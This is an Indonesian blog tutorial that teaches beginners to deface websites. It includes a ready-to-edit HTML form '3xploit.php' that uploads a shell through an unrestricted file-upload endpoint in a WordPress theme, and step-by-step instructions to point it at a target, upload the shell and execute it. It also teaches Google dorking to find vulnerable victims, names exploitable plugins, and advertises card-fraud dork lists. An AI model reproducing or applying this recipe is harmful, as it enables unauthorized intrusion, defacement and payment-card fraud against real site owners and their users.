Sunday, April 22, 2018

Toturial DEFACE BLOG UNTUK PEMULA NEW TRICK 2018

Cara Belajar Deface Untuk Pemula

Cara Belajar Deface Untuk Pemula

Cara Belajar Deface Untuk Pemula - Deface adalah hal yang dilakukan untuk masuk kesebuah sistem website didalamnya. Defacer adalah orang yang melakukan deface

Sistem website / cms itu ada berbagai macam halnya seperti Wordpress,JoomlaPrestashop dan cms lainnya. Untuk melakukan deface itu sulit sulit gampang, Gampangnya adalah kita mudah untuk memahami tehnik tehnik alur defacenya. kalo kita bacanya detail sambil dipreaktekin,

Nah susahnya juga inilah yang membuat defacer newbie menyerah, yaitu tentang dorking ( akan dijelaskan dibawah ) banyak sekali newbie yang menyerah dalam melakukan dorking ini walaupun dia sudah mengetahul dan memahami teknik alur defacenya tersebut .

Pengenalan CSRF & Remote Shell :
Dalam hal deface CSRF & Xampp paling mendominasi banyak hal dari tehnik, Oke langsung saja. 

Cara Menggunakan CSRF ? 
Lihat Disini : Deface Dengan CSRF (Cross Site Request Forgery)

Cara Menggunakan Remote Shell :

File 3xploit.php
(dibawah ini )
<form enctype="multipart/form-data" action="http://www.yeah.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php" method="post">Please choose a file: <input name="uploadfile" type="file" /><br /><input type="submit" value="upload" /></form>

1. Pertama Install Xampp nya, lalu kalo udah selesai, extrack file 3xploit.php,Shell.php dan letakkan di C:\xampp\php

2. Jangan lupa edit dulu 3xploit.php dengan Notepad, silahkan dirubah www.yeah.com menjadi target anda  Lalu Save kembali..

3. Selanjutnya buka Xampp, lalu klik Start Apache, MySql, FileZilla

4. Setelah itu buka Terminal/CMD, lalu masuk ke directories C:\xampp\php>
Lalu ketik perintah php 3xploit.php dan tunggu aja hasilnya :)

5. Terus cari shellnya dah, berdasarkan shell pathnya :) 

Nah, tinggal di eksekusi dah shellnya :)

Apa itu Exploit 
Exploit adalah sebuah teknik yang menyerang keamanan_komputer / website secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer/web tujuan

Contoh Exploit :  
Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
Wordpress Tevolution Plugin File Upload Vulnerability

Apa itu dork 
Google dork adalah sebuah keyword yang digunakan untuk mencari target .

Type-type dork:

-intitle
-allintitle
(Mencari judul/title pada suatu web)

-inurl
-allinurl
(Mencari suatu string yang terdapat pada url)

-filetype
(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)

-intext
-allintext
(Mencari suatu nilai string dalam suatu web)

Contoh Dork ? +650 Dork Carding CC/Paypal [ Fresh ] 

Metode Vulnerability
AddUser  Arbitrary Bypass  CSRF  File Upload Multiple  RemoteFile  Unrestricted  Uploadify  dll

Cara Deface Random Pemula

1. Untuk bisa melakukan deface pertama tama kamu harus tau exploitnya dari berbagai cms diatas tadi. 
2. Terus dorking targetnya 
3 Selanjutnya lihat lah, metode apa yang digunakan dalam exploit tersebut Apakah menggunakan CSRF / Remote Shell/ dll
4. Eksekusi

Pertanyaan Seputar Deface :

Apakah deface juga memerlukan sebuah software / tools ? 
Iya pasti deface memerlukan sebuah banyak tools karena kita tidak bisa melakukannya secara sendiri. lalu tools dasar apa saja yang harus ada ?

Untuk Pc : 
Xampp

Untuk Android :
Webmaster lite
Palapa Webserver

Intinya adalah : 

Deface itu gak mudah, banyak banget ilmu yang harus dipelajari. Gak semudah mulut lu bilang " Gue Hacker "

Pesan :

Untuk belajar deface kamu jangan hanya membaca saja, tapi yang benar adalah, BACA DAN LAKUKAN saat itu juga. Tanpa melakukan kamu hanya paham teori saja tanpa hasil nyata ! Dan jangan banyak bertanya, jangan disuapin terus, Jika kamu kesuliatan, gunakanlah mbah google untuk mengatasi kesulitan tersebut. kamu harus mandiri dalam menggali ilmu deface. Karena jika guru mu mati, tidak ada yang menyuapi kamu lagi :) 

Itu adalah Cara Belajar deface Untuk pemula dari segi umumnya, untuk lebih detail dan jelasnya. Silahkan dicoba sendiri exploit exploit yang ada, Terimakasih semoga dapat membantu :)


Regards 

3xploi7 Team

    Choose :
  • OR
  • To comment
No comments:
Write comments

IBX5AAE15B0D944A